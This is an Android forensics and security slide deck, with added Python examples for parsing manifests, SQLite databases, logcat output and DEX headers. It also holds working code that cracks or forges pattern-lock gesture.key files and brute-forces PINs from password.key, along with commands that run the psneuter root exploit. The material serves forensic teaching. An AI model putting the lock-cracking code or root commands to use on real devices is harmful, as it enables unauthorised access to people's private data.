8/9/2019 androidforensicsandsecuritytesting--phpapp02
1/93
ANDROID – FORENSICS AND SECURITY ANALYSIS
Santhosh Kumar
r00t@b0x : whoami?
Security Researcher for quite some time (certs: CEH)
POC at Defcon Chennai.
Currently working on ARM based exploitation.
Reported bugs in some web apps at Microsoft, Yahoo, Intel, IBM, Cisco etc.
Currently doing Bachelors in Computer Science.
Agenda:
Introduction to Android and its history.
Study the Android file systems and directories.
Bypass passcodes (all types of locks).
Physical and logical data extraction techniques.
Reverse engineer Android applications.
Indian cyber laws.
Why forensics? WTH is this?
Evidence for legal proceedings.
Financial crime.
Pornography / child pornography (pedophiles).
Sexual harassment (against women).
Terrorism activity or national threat.
Cyber threats.
Counter intelligence. Murder or other crimes.
Eg: Georgia Weidman attacked @confidenceconference Poland.
Introduction to Android. History?
Widely used smartphone OS with over 77% share in 2013.
The man behind Android was
Android features.
Android has key features which are useful from the forensic point of view.
Features like GPS, CDMA, LTE, WiMAX, WiFi, Bluetooth etc. Google Play Store / Android Market is a rich source for forensic analysis.
Data storage:
Flash (or NAND) memory.
Internal memory.
External memory.
Android overview:
Global System for Mobile Communications (GSM): a Subscriber Identity Module or Universal Subscriber Identity Module (SIM or USIM) identifies the user to the cellular network. Eg: AT&T, T-Mobile (US); India: BSNL, Airtel.
Code Division Multiple Access (CDMA). Eg: Sprint, Verizon (US); India: Tata Docomo, MTS.
Integrated Digital Enhanced Network (iDEN), which is yet to be available in India; US: Sprint.
Worldwide Interoperability for Microwave Access (WiMAX): US Sprint; India: BSNL, Reliance.
Long Term Evolution LTE (4G): US AT&T, Sprint, T-Mobile, Verizon; India: Airtel, Aircel (TD-LTE).
Android overview: Apps
The total number of Android apps crossed 1 million in Nov 2013, with another 70000 apps published in Jan 2014.
The other competitor, Apple, has a strict app uploading and review process which can take a long time, on fulfilling many criteria and conditions. Sometimes the apps are denied after a long review. iOS doesn't allow apps from outside the App Store.
Google requires less process for submitting an app (such as the signing key), while Google has the power to remove the app from the market, ban-hammer the developer and remotely uninstall the app.
AOSP importance
As said earlier, AOSP maintains the development and releases new versions and fixes.
Compiling AOSP is the best way to understand the working of Android.
http://source.android.com/source/initializing.html
Not necessary for forensic analysts but useful for deep experimentation.
We won't be doing that now.
Linux, open source software in forensics
Open source forensic tools have always been more effective in the digital forensic discipline. Open source tools have the upper hand over closed source tools: the power to view the source code and understand how it works, the ability to share software and improve it by working together with the forensic community, and they are free or low cost.
Linux is not only a critical component of Android but can be effectively used in forensic analysis.
LINUX commands:
Android forensics involves some Linux knowledge; the following commands are useful:
man
help
cd
mkdir
mount
rmdir / rm -rf
nano
ls
tree
cat
dd
find
chown
chmod
sudo
apt-get
grep
& many more ......
Environment setup
Ubuntu 32/64 bit (I recommend 64 bit) with the Android SDK
Ubuntu 12.04 (precise) 64 bit running on VMware / VirtualBox
http://www.vmware.com or http://www.virtualbox.org
Have at least 20 GB free space and 2 GB RAM.
Have Windows for some commercial tools (explained later).
I recommend Santoku Linux, which is an entire hacking distro dedicated to mobile forensics and security.
http://www.santoku-linux.com, which is indeed made by http://www.viaforensics.com, a mobile pentesting company.
Android architecture
HARDWARE DEVICES
Smartphones
Tablets
Google TV, car audio systems
Google Glass
Smart watch
LG fridge and washing machine
Mirrors (you saw it right :) cybertecturemirror.com
Cameras
Gaming consoles
DECT phones (an Android landline)
Smart TVs
and 1000+ Android devices
ROM booting process
Stock ROMs vary from manufacturer to manufacturer.
Actually the phone booting process.
Short seven-step ROM booting process:
Power on and boot ROM code execution
The boot loader
The Linux kernel
The init process
Zygote and Dalvik
The system server
Boot completed
ROM booting process
http://www.androidenea.com/2009/06/android-boot-process-from-power-on.html
Android application security model
At installation of the app (.apk) Android checks the developer's unique signature (not a CA-issued certificate: app certificates are self-signed).
Next it displays the permissions the app requests. The source of those is AndroidManifest.xml.
This file is the first stop in forensic analysis to determine the permissions of a (malicious) app.
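An added example (not from these slides) of what that first stop looks like in practice: parse a decoded AndroidManifest.xml (the text form apktool produces), list the requested permissions, and flag the combinations an analyst cares about. The manifest text, the package name and the DANGEROUS subset are constructed for the demo; the real dangerous-permission list is longer.

```python
# Added example (not from the slides): triage the permissions and SMS
# receivers declared in a decoded AndroidManifest.xml. The manifest text is
# constructed for the demo; DANGEROUS is a hand-picked subset of Android's
# dangerous-level permissions, not the complete list.
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: a "flashlight" app that wants SMS access and boot persistence.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="Flashlight">
        <receiver android:name=".SmsReceiver">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

DANGEROUS = {
    "android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS", "android.permission.READ_CONTACTS",
    "android.permission.READ_CALL_LOG", "android.permission.RECORD_AUDIO",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.CAMERA",
}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"


def parse_manifest(xml_text):
    """Return package name, requested permissions and SMS broadcast receivers."""
    root = ET.fromstring(xml_text)
    perms = sorted(e.get(ANDROID_NS + "name") for e in root.iter("uses-permission"))
    sms_receivers = []
    for recv in root.iter("receiver"):
        for filt in recv.iter("intent-filter"):
            actions = {a.get(ANDROID_NS + "name") for a in filt.iter("action")}
            if SMS_RECEIVED in actions:
                prio = int(filt.get(ANDROID_NS + "priority", "0"))
                sms_receivers.append((recv.get(ANDROID_NS + "name"), prio))
    return {
        "package": root.get("package"),
        "permissions": perms,
        "dangerous": [p for p in perms if p in DANGEROUS],
        "sms_receivers": sms_receivers,
    }


def triage(report):
    """Heuristic findings a forensic analyst would want flagged."""
    findings = []
    perms = set(report["permissions"])
    if report["dangerous"]:
        findings.append("dangerous permissions: " + ", ".join(report["dangerous"]))
    # A high-priority SMS_RECEIVED receiver sees (and can abort) incoming SMS
    # before the stock messaging app does: the classic OTP-stealer pattern.
    for name, prio in report["sms_receivers"]:
        if prio > 0 and "android.permission.RECEIVE_SMS" in perms:
            findings.append(f"SMS interception candidate: receiver {name} priority {prio}")
    if {"android.permission.RECEIVE_BOOT_COMPLETED", "android.permission.INTERNET"} <= perms:
        findings.append("persists across reboot and talks to the network")
    return findings


if __name__ == "__main__":
    rep = parse_manifest(SAMPLE_MANIFEST)
    print(rep["package"], rep["permissions"])
    for finding in triage(rep):
        print("[!]", finding)
```

The manifest inside a real .apk is binary XML; run apktool (or `aapt dump xmltree`) first and feed the text output to parse_manifest.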
Application process
Quick review of Android app execution.
Even though Android apps are written in Java, they are not executed as Java bytecode (they run as Dalvik bytecode).
Each app gets a unique Linux user ID (uid) and group ID (gid).
Gets its own dedicated process and dedicated Dalvik VM.
The app data gets stored in /data/data/<app package>, accessible only by that UID and GID (root excepted).
Apps can share data with other apps using content providers.
Some files which are useful
cache.img: disk image of the /cache partition.
sdcard.img: disk image of the sdcard partition (img here is from the AVD emulator).
userdata-qemu.img: disk image of the data partition.
... Useful in the areas of forensics
USB connection of the evidence device
Different devices have different options.
The common four are: charge only, file transfer, sync, internet tethering.
Check the connection to the host by typing
Checking USB connection
Precautions (must needed):
Make sure to disable the auto mount feature in Ubuntu to prevent automatic detection and mounting of USB storage.
Every careless change could lead to alteration of evidence.
A hardware write blocker is useful to some extent.
SD card info
Most of the SD card details are stored in /data/
App details in /data/data (it differs :)
Android Debug Bridge
Most important component when it comes to Android forensics.
Consider it a swiss army knife for forensics and security analysts.
Enable USB debugging: Developer options > USB debugging.
This will run adbd (daemon) on the device.
adbd runs as the unprivileged shell user (UID shell) unless restarted with root privileges.
If your device is locked then it is difficult to enable USB debugging (not 100% impossible).
ADB components
adbd on the device.
adb server on the workstation.
adb client on the workstation.
adb is free, the primary tool for forensics, and of course open source.
adb shell example
adb shell gives out a lot of information (depends on root or not).
The /data folder is useful when you are rooted.
Data from adb
SMS history (deleted).
Contacts (com.android.providers.contacts)
Call history: received, deleted, missed etc.
Databook
Events.
Calendar.
File systems
Lots of file systems in the Android operating system.
More than a dozen are in use.
The main three are EXT, FAT32, YAFFS2: the source for the user data.
Data storage methods
The main methods where sensitive data is stored:
Shared preferences
Internal storage
External storage
SQLite3
Network
Shared preferences
Per-app key-value settings; despite the name they are not shared between apps unless the app makes the file world-readable.
Key values are stored in XML files under /data/data/<package>/shared_prefs/.
Internal storage
Common in most of the systems: ext3, ext4, yaffs2.
An unrooted user cannot access /data/data: it is protected by per-app UID file permissions (not encryption). Root is needed for viewing the contents.
Internal storage
u0_a10 as the owner means the Linux UID assigned to that app when it was installed (user 0, app number 10, i.e. uid 10010).
External storage
It has fewer restrictions when compared to the internal storage.
FAT32 is the commonly found file system on the sdcard.
As suggested earlier, most app data is stored here, so it is better to look here.
SQLITE3 some useful commands
sqlite3 dbfilename        Loads the db
.tables                   Shows the tables
.headers on|off           Turns headers on/off
.mode                     Output mode (file type)
select * from table;      Displays the table rows
.dump ?table?             Dumps the table
.quit                     Exits the shell prompt
SQLite3 database example
Little catch: sqlite3 is not installed on real phones by default.
For test conditions I have used the AVD emulator from Android.
Those databases have lots of tables which can be really handy.
Some native roots have sqlite3 symlinked by default.
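Since sqlite3 is usually missing on the phone, the practical route is `adb pull` the database and inspect it on the workstation. The added example below (not from the slides) does from Python what the dot-commands on the previous slide do, and decodes the millisecond timestamps Android stores. The database is constructed here with the column layout of the sms table in the telephony provider's mmssms.db; the numbers and messages in it are made up.

```python
# Added example (not from the slides): inspect a pulled SQLite database the
# way the sqlite3 dot-commands do, from Python, and normalise Android's
# millisecond timestamps. The database is constructed with the columns of
# the sms table in mmssms.db; its rows are invented sample data.
import os
import sqlite3
import tempfile
from datetime import datetime, timezone

SMS_TYPE = {1: "inbox", 2: "sent", 3: "draft", 4: "outbox", 5: "failed", 6: "queued"}


def build_sample_db(path):
    """Write a constructed mmssms.db-style database to *path*."""
    conn = sqlite3.connect(path)
    conn.executescript("""
        CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT,
                          date INTEGER, type INTEGER, body TEXT);
        CREATE TABLE threads (_id INTEGER PRIMARY KEY, message_count INTEGER, snippet TEXT);
        INSERT INTO sms VALUES (1, 1, '+911234567890', 1386000000000, 1, 'call me back');
        INSERT INTO sms VALUES (2, 1, '+911234567890', 1386000600000, 2, 'on my way');
        INSERT INTO sms VALUES (3, 2, '+919876543210', 1386001200000, 1, 'your OTP is 4821');
        INSERT INTO threads VALUES (1, 2, 'on my way');
        INSERT INTO threads VALUES (2, 1, 'your OTP is 4821');
    """)
    conn.commit()
    conn.close()


def list_tables(path):
    """Equivalent of .tables: read the schema catalogue."""
    conn = sqlite3.connect(path)
    try:
        return [r[0] for r in conn.execute(
            "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name")]
    finally:
        conn.close()


def android_ms_to_iso(ms):
    """Android stores dates as milliseconds since the epoch; render as UTC ISO-8601."""
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def dump_sms(path):
    """'.headers on' + 'select * from sms', with type and date decoded."""
    conn = sqlite3.connect(path)
    conn.row_factory = sqlite3.Row
    try:
        rows = []
        for r in conn.execute("SELECT * FROM sms ORDER BY date"):
            d = dict(r)
            d["type"] = SMS_TYPE.get(d["type"], d["type"])
            d["date"] = android_ms_to_iso(d["date"])
            rows.append(d)
        return rows
    finally:
        conn.close()


def dump_sql(path):
    """Equivalent of .dump: full SQL text of schema and rows, for the case file."""
    conn = sqlite3.connect(path)
    try:
        return "\n".join(conn.iterdump())
    finally:
        conn.close()


def demo():
    """Build the sample db in a temp dir and run the three inspections on it."""
    db = os.path.join(tempfile.mkdtemp(), "mmssms.db")
    build_sample_db(db)
    return db, list_tables(db), dump_sms(db), dump_sql(db)


if __name__ == "__main__":
    db, tables, sms, dump = demo()
    print("tables:", tables)
    for row in sms:
        print(row)
    print(dump[:200])
```

Always work on a copy of the pulled file and never open the original with a writable connection: SQLite will happily create a journal next to it.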
Logcat
Displays almost everything that's been going on in your device, from the adb shell. http://developer.android.com/tools/help/logcat.html
Has different parameters.
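Logcat is volatile and scrolls fast, so the usual move is to save `adb logcat -v threadtime` to a file and mine it afterwards. The added example below (not from the slides) parses that format offline and extracts what a timeline needs: which pid ran a package and under which uid, everything that pid logged, and lines at warning level or above. The log lines are constructed; the package, host and pid values are invented.

```python
# Added example (not from the slides): parse `adb logcat -v threadtime`
# output offline. The log lines below are constructed; the package name,
# the upload host and the pid/uid values are invented for the demo.
import re

LOGCAT_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s+"
    r"(?P<pid>\d+)\s+(?P<tid>\d+)\s+(?P<level>[VDIWEF])\s+"
    r"(?P<tag>[^:]+?)\s*:\s?(?P<msg>.*)$"
)
LEVEL_ORDER = "VDIWEF"  # verbose < debug < info < warn < error < fatal
START_PROC_RE = re.compile(r"Start proc (?P<proc>\S+) .*?pid=(?P<pid>\d+) uid=(?P<uid>\d+)")

SAMPLE_LOG = """\
12-02 16:03:11.123  1234  1256 I ActivityManager: Start proc com.example.flashlight for broadcast com.example.flashlight/.SmsReceiver: pid=4321 uid=10010 gids={3003}
12-02 16:03:11.400  4321  4321 D SmsReceiver: got SMS from +919876543210
12-02 16:03:11.512  4321  4330 W System.err: java.net.SocketTimeoutException: connect timed out
12-02 16:03:12.001   611   640 E NetworkStats: incorrect dev stats
12-02 16:03:12.300  4321  4330 I SmsReceiver: POST http://203.0.113.7/upload ok
garbage line that is not logcat output
"""


def parse_logcat(text):
    """Return a dict per well-formed threadtime line; silently skip the rest."""
    entries = []
    for line in text.splitlines():
        m = LOGCAT_RE.match(line)
        if m:
            e = m.groupdict()
            e["pid"] = int(e["pid"])
            e["tid"] = int(e["tid"])
            entries.append(e)
    return entries


def at_least(entries, level):
    """Filter like `logcat *:W`: keep entries at *level* or more severe."""
    floor = LEVEL_ORDER.index(level)
    return [e for e in entries if LEVEL_ORDER.index(e["level"]) >= floor]


def process_starts(entries):
    """Map pid -> (process name, uid) from ActivityManager 'Start proc' lines."""
    starts = {}
    for e in entries:
        if e["tag"] == "ActivityManager":
            m = START_PROC_RE.search(e["msg"])
            if m:
                starts[int(m["pid"])] = (m["proc"], int(m["uid"]))
    return starts


def timeline_for_process(entries, proc_name):
    """Every line emitted by the pid(s) that ran *proc_name*, in log order."""
    pids = {pid for pid, (name, _uid) in process_starts(entries).items() if name == proc_name}
    return [e for e in entries if e["pid"] in pids]


if __name__ == "__main__":
    ents = parse_logcat(SAMPLE_LOG)
    for e in at_least(ents, "W"):
        print(e["ts"], e["level"], e["tag"], e["msg"])
    print(process_starts(ents))
    for e in timeline_for_process(ents, "com.example.flashlight"):
        print(e["ts"], e["tag"], e["msg"])
```

The uid recovered from the `Start proc` line (10010 here) is the same number that shows up as the owner of the app's /data/data directory, which ties log lines to on-disk evidence.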
Enable USB debugging when locked?? Possible
BST (Best Smart Tools)
Crack the codes
Unlucky still? Here comes the passcode breaking!
Very useful when it comes to forensics! Nothing beats this.
Various techniques for breaking Android passcodes.
A few will be discussed here.
There is no direct rule for breaking passcodes.
Types of passwords?
Cracking techniques
Smudge attack.
Pattern lock vulnerability.
psneuter with adb, USB debugging (if enabled). Cracking the password key.
Face unlock pwn with a picture.
Continues to evolve ....
Smudge attack
The screen (digitizer) is a reflective surface; the smudge (pattern) diffuses in the glass.
Being dust particles, they reflect when exposed to light.
A camera setup capturing the overexposed image around 68 times will give an 80% correct image.
It gives out the drawn pattern.
Not always working; playing Temple Run could remove the smudge totally.
Pattern lock crack
The pattern creates a file at /data/system/gesture.key.
The hash is stored there. If a custom recovery is installed, like TWRP recovery, CWM recovery etc.,
remove the key using the rm command and recreate it using your own hash.
The key can also be cracked! It is an unsalted SHA-1 of the pattern's dot sequence, so a lookup table covers every possible pattern. Some sites do give the service for free.
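Both halves of the slide, cracking a pulled gesture.key and forging a replacement, follow directly from the file format: on Android 4.x it is the 20-byte SHA-1 of the pattern's dot indices (0 to 8, row by row), with no salt. The added example below (not from the slides, and not a reproduction of any online service) enumerates every drawable 3x3 pattern under the standard rule that a stroke cannot jump over an unvisited dot, builds the lookup table, and inverts a key. The target key is constructed from a known pattern for the demo.

```python
# Added example (not from the slides): crack or forge /data/system/gesture.key.
# Android 4.x stores the raw SHA-1 of the pattern's dot indices with no salt,
# so a table of every valid pattern inverts it instantly. The enumeration
# uses the standard 3x3 rule (no jumping over an unvisited dot). The key
# used in the demo is constructed from a known pattern.
import hashlib
from functools import lru_cache


def _midpoint(a, b):
    """Dot index lying exactly between dots a and b on the 3x3 grid, or None."""
    ra, ca = divmod(a, 3)
    rb, cb = divmod(b, 3)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None
    return ((ra + rb) // 2) * 3 + (ca + cb) // 2


@lru_cache(maxsize=None)
def all_patterns(min_len=4, max_len=9):
    """Every valid unlock pattern as a tuple of dot indices (389,112 in total)."""
    out = []

    def walk(path, visited):
        if len(path) >= min_len:
            out.append(tuple(path))
        if len(path) == max_len:
            return
        for nxt in range(9):
            if nxt in visited:
                continue
            mid = _midpoint(path[-1], nxt)
            if mid is not None and mid not in visited:
                continue  # would pass over an untouched dot; Android snaps to it instead
            visited.add(nxt)
            path.append(nxt)
            walk(path, visited)
            path.pop()
            visited.remove(nxt)

    for start in range(9):
        walk([start], {start})
    return tuple(out)


@lru_cache(maxsize=None)
def _table():
    """sha1(pattern bytes) -> pattern, for every drawable pattern."""
    return {hashlib.sha1(bytes(p)).digest(): p for p in all_patterns()}


def make_gesture_key(pattern):
    """Forge a gesture.key for *pattern* (what you write back via a custom recovery)."""
    key = hashlib.sha1(bytes(pattern)).digest()
    if key not in _table():
        raise ValueError("not a drawable pattern")
    return key


def crack_gesture_key(key_bytes):
    """Recover the pattern from the 20-byte gesture.key contents, or None."""
    return _table().get(bytes(key_bytes[:20]))


if __name__ == "__main__":
    forged = make_gesture_key([0, 1, 2, 5, 8])  # top row left to right, then down the right edge
    print(forged.hex(), "->", crack_gesture_key(forged))
```

The table is about 389k SHA-1 values and builds in a couple of seconds, which is why "decryption" services for gesture.key can be free: there is nothing to decrypt, only to look up.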
Cracking PINs
When passwords/PINs are used they are stored in /data/system/password.key.
As you can see it is not plaintext but salt+sha1+md5.
Not easy; depends on the nature of the password.
Pull the salt (lockscreen.password_salt) from /data/data/com.android.providers.settings/databases/settings.db and get the password hash from the file above.
Put them in a folder and attack them with password recovery tools such as hashcat / John the Ripper by bruteforcing them.
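Before reaching for hashcat it helps to know exactly what is in the two files. The added example below (not from the slides) rebuilds the Android 4.x scheme: password.key is the upper-case hex of SH-1 followed by MD5 of `password + Long.toHexString(salt)`, 72 characters in all, and the salt is a Java long in settings.db under lockscreen.password_salt. It then brute-forces a numeric PIN against the SHA-1 half. The settings.db and the key are constructed from a known PIN so the demo runs offline; the salt value is invented.

```python
# Added example (not from the slides): rebuild and brute-force the
# /data/system/password.key scheme of Android 4.x. LockPatternUtils hashes
# password + Long.toHexString(salt) with SHA-1 and MD5 and stores both as
# upper-case hex; the salt lives in settings.db (table 'secure',
# lockscreen.password_salt). Database, salt and PIN here are constructed.
import hashlib
import itertools
import os
import sqlite3
import tempfile


def salt_to_string(salt_long):
    """Java's Long.toHexString: unsigned two's complement, lower-case, no padding."""
    return format(salt_long & 0xFFFFFFFFFFFFFFFF, "x")


def password_key(password, salt_long):
    """Contents of password.key for *password*: SHA1 hex + MD5 hex, upper-case."""
    data = (password + salt_to_string(salt_long)).encode("utf-8")
    return (hashlib.sha1(data).hexdigest() + hashlib.md5(data).hexdigest()).upper()


def write_sample_settings_db(path, salt_long):
    """Constructed settings.db holding just the rows the attack needs."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE secure (_id INTEGER PRIMARY KEY, name TEXT UNIQUE, value TEXT)")
    conn.execute("INSERT INTO secure (name, value) VALUES ('lockscreen.password_salt', ?)",
                 (str(salt_long),))
    # 131072 (0x20000) is PASSWORD_QUALITY_NUMERIC: tells you a PIN, not a password, is set.
    conn.execute("INSERT INTO secure (name, value) VALUES ('lockscreen.password_type', '131072')")
    conn.commit()
    conn.close()


def read_salt(db_path):
    """Pull lockscreen.password_salt out of a (copied) settings.db."""
    conn = sqlite3.connect(db_path)
    try:
        row = conn.execute(
            "SELECT value FROM secure WHERE name = 'lockscreen.password_salt'").fetchone()
    finally:
        conn.close()
    return int(row[0]) if row else None


def crack_pin(key_hex, salt_long, min_len=4, max_len=4):
    """Brute-force a numeric PIN against the SHA-1 half of password.key."""
    target_sha1 = key_hex.strip().upper()[:40]
    salt = salt_to_string(salt_long).encode("utf-8")
    for n in range(min_len, max_len + 1):
        for digits in itertools.product(b"0123456789", repeat=n):
            pin = bytes(digits)
            if hashlib.sha1(pin + salt).hexdigest().upper() == target_sha1:
                return pin.decode()
    return None


def demo(pin="4821", salt_long=-2914349103932584):
    """Simulate the pull: write settings.db, derive the key, recover the PIN."""
    db = os.path.join(tempfile.mkdtemp(), "settings.db")
    write_sample_settings_db(db, salt_long)
    key = password_key(pin, salt_long)   # what you would read from password.key
    salt = read_salt(db)                 # what you would read from settings.db
    return key, salt, crack_pin(key, salt)


if __name__ == "__main__":
    key, salt, pin = demo()
    print("password.key:", key)
    print("salt:", salt, "->", salt_to_string(salt))
    print("recovered PIN:", pin)
```

A 4-digit PIN falls in 10,000 SHA-1 calls; the same loop over an alphanumeric password is where hashcat or John earns its keep, and the salt string above (not the raw long) is what you hand them.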
Pwn face & voice unlock
Not secure at all when Google introduced it in Android 4.0.
Reported to unlock with a photo of the person.
After the Jelly Bean (4.1) update face unlock changed so that the person has to blink an eye, which is meant to show the liveness of the captured image.
Again easily broken by duck faces, smiling images from Facebook :)
Get fRoSted
The FROST team was able to break the encryption by cooling the device to -15 °C in 60 minutes (a cold boot attack on the RAM).
Switch off and flash the FROST recovery.
Not the entire AES key is recovered. Some bits were decayed.
g0t r00t?
Types of r00t?
Temp root: gives you root access till you reboot the device.
Recovery root: a custom recovery such as ClockworkMod (CWM), TWRP etc. will give root access in the recovery.
Permanent root: installs su to the system partition, leaving a huge footprint. Most custom ROMs have perm root by default, eg: CyanogenMod, Omni, Paranoid Android etc.
Temporary root
Temp root is essential when it comes to forensics (z4root.apk).
Doesn't work on all devices; test it first before using.
psneuter: a temp root solution.
psneuter exploits adbd, the Android debug server, giving us a temporary root shell.
adb devices
adb push psneuter /data/local/tmp
adb shell
cd /data/local/tmp
chmod 777 psneuter
./psneuter
Permanent root
Not good as far as forensics is concerned.
Leaves a huge footprint altering the evidence. Search XDA for more roots.
R00t with binary
Gives root to almost all 4.0 to 4.1 devices.
Kingo Android Root
This one gives root on all 4.2.x, 4.3.x, 4.4.x.
Android forensic techniques
Logical and physical acquisition.
Open source tools and some commercial tools: QtADB, Andriller, Cellebrite, Paraben, viaExtract ...
Logical vs physical acquisition
Logical                                      | Physical
Access to the file systems                   | Exploring the memory, not the file system
Data which is already available to the user  | More data than logical, by breaking passwords etc.
Eg: ADB pull, AFLogical                      | Hardware and software
Logical SD card acquisition
App data gets stored in /data, which is protected by file permissions and needs root access.
SD cards are where the user stuff stays (audio, video, maps). Uses the cross-platform FAT FS.
Most backups are stored on the SD card.
.apk's on the sdcard might be encrypted (apps moved to SD live in .asec containers).
Useful when 3rd party apps are analysed.
ADB pull (logical)
QtADB
AFLogical
Data extraction tool.
Free for law enforcement agencies.
Records call logs, contacts etc.
DEMO
UFED Touch Ultimate
UFED Touch Ultimate enables the most technologically advanced extraction, decoding, analysis and reporting of mobile data. It performs physical, logical, file system and password extraction of all data (even if deleted) from the widest range of devices including legacy and feature phones, smartphones, portable GPS devices, tablets and phones manufactured with Chinese chipsets. Cost: 10000$
UFED WhatsApp analysis
Device Seizure
Device Seizure: Report
Andriller
An alternative and a powerful open source tool.
http://android.saz.lt/
Made by Denis Sazonov @den4uk
Give it a try, you won't regret it.
DEMO........
Photos
Try looking here for more evidence.
Reversing APKs
Rename the Android app (.apk) to .zip.
Extract the zip.
Run dex2jar on the extracted classes.dex. Open the .jar in a Java decompiler.
APKTOOL
Androguard
APKinspector
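The first two steps above (an .apk is a zip, classes.dex is the code) can be done programmatically, and a reverser should check the DEX header's own integrity fields before trusting dex2jar's output: the adler32 checksum covers everything after itself and the SHA-1 signature covers everything after the header's first 32 bytes. The added example below (not from the slides, and not any of the tools listed) builds an APK in memory with a header-only DEX, so dex2jar would not accept it, but the file names and header layout are the real ones; the placeholder manifest, certificate and icon bytes are constructed.

```python
# Added example (not from the slides): open an .apk as a zip, pull out
# classes.dex and verify the DEX header (version, adler32 checksum, SHA-1
# signature). The APK is built in memory with a header-only DEX; manifest,
# certificate and icon entries are placeholders, not real data.
import hashlib
import io
import struct
import zipfile
import zlib

DEX_HEADER = struct.Struct("<8sI20s20I")  # magic, checksum, signature, 20 u4 fields = 0x70 bytes


def build_fake_dex(class_defs=3, method_ids=12):
    """Constructed 0x70-byte DEX consisting of a valid header and nothing else."""
    hdr = bytearray(DEX_HEADER.size)
    hdr[0:8] = b"dex\n035\0"
    struct.pack_into("<I", hdr, 32, len(hdr))      # file_size
    struct.pack_into("<I", hdr, 36, 0x70)          # header_size
    struct.pack_into("<I", hdr, 40, 0x12345678)    # endian_tag (little endian)
    struct.pack_into("<I", hdr, 88, method_ids)    # method_ids_size
    struct.pack_into("<I", hdr, 96, class_defs)    # class_defs_size
    hdr[12:32] = hashlib.sha1(hdr[32:]).digest()   # signature: SHA-1 of everything after it
    struct.pack_into("<I", hdr, 8, zlib.adler32(bytes(hdr[12:])) & 0xFFFFFFFF)  # checksum
    return bytes(hdr)


def build_sample_apk():
    """Constructed APK: manifest placeholder, DEX, signature files, one resource."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + bytes(28))  # binary XML magic only
        z.writestr("classes.dex", build_fake_dex())
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
        z.writestr("META-INF/CERT.RSA", b"\x30\x82\x00\x00")  # placeholder, not a real PKCS#7 blob
        z.writestr("res/drawable/icon.png", b"\x89PNG\r\n\x1a\n")
    return buf.getvalue()


def parse_dex_header(dex):
    """Decode the DEX header and recompute its two integrity fields."""
    f = DEX_HEADER.unpack_from(dex, 0)
    magic, checksum, signature = f[0], f[1], f[2]
    (file_size, header_size, endian_tag, _ls, _lo, _mo, string_ids, _so, type_ids, _to,
     proto_ids, _po, field_ids, _fo, method_ids, _meo, class_defs, _co, _ds, _do) = f[3:]
    return {
        "version": magic[4:7].decode("ascii") if magic[:4] == b"dex\n" else None,
        "file_size": file_size, "header_size": header_size,
        "little_endian": endian_tag == 0x12345678,
        "checksum_ok": checksum == (zlib.adler32(dex[12:]) & 0xFFFFFFFF),
        "signature_ok": signature == hashlib.sha1(dex[32:]).digest(),
        "strings": string_ids, "types": type_ids, "protos": proto_ids,
        "fields": field_ids, "methods": method_ids, "classes": class_defs,
    }


def inspect_apk(apk_bytes):
    """Steps 1 and 2 of the slide: treat the .apk as a zip and pull classes.dex out."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        dex = z.read("classes.dex")
    sigs = [n for n in names
            if n.startswith("META-INF/") and n.rsplit(".", 1)[-1] in ("RSA", "DSA", "EC")]
    return {
        "apk_sha256": hashlib.sha256(apk_bytes).hexdigest(),
        "entries": names,
        "has_manifest": "AndroidManifest.xml" in names,
        "signature_blocks": sigs,
        "dex_sha1": hashlib.sha1(dex).hexdigest(),
        "dex": parse_dex_header(dex),
    }


if __name__ == "__main__":
    report = inspect_apk(build_sample_apk())
    print(report["entries"])
    print(report["dex"])
```

Record apk_sha256 and dex_sha1 in the case notes before running any tool that rewrites the file (apktool rebuilds do), and treat a failing checksum or signature as a sign of a hand-patched or packed DEX rather than a broken sample.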
Android/Torec
The first ever Android based Tor malware found in the wild.
REVERSING DEMO
Future of Android forensics
The future research work will be on SEAndroid.
Contributed by the National Security Agency (NSA) *cough*
Motto: to have a secure Android.
Wait! Wait? Wait?
SEAndroid was already defeated: CVE-2013-6282.
Pau Oliva had a POC based on a Toshiba tablet running 4.3 JB.
INDIA cyber laws
Device as target or weapon
IT Act 2000
IT Amendment Act (2008)
Rules under 66, 43, 79
SECTION 65
http://www.cyberforensics.in/ http://deity.gov.in/content/cyberlaws
ANY QUESTIONS?
References:
viaforensics.com
forensicfocus.com
cellebrite.com
android.saz.lt
exploit-db.com
http://www.forensicswiki.org/wiki/Cell_Phone_Forensics
xda-developers.com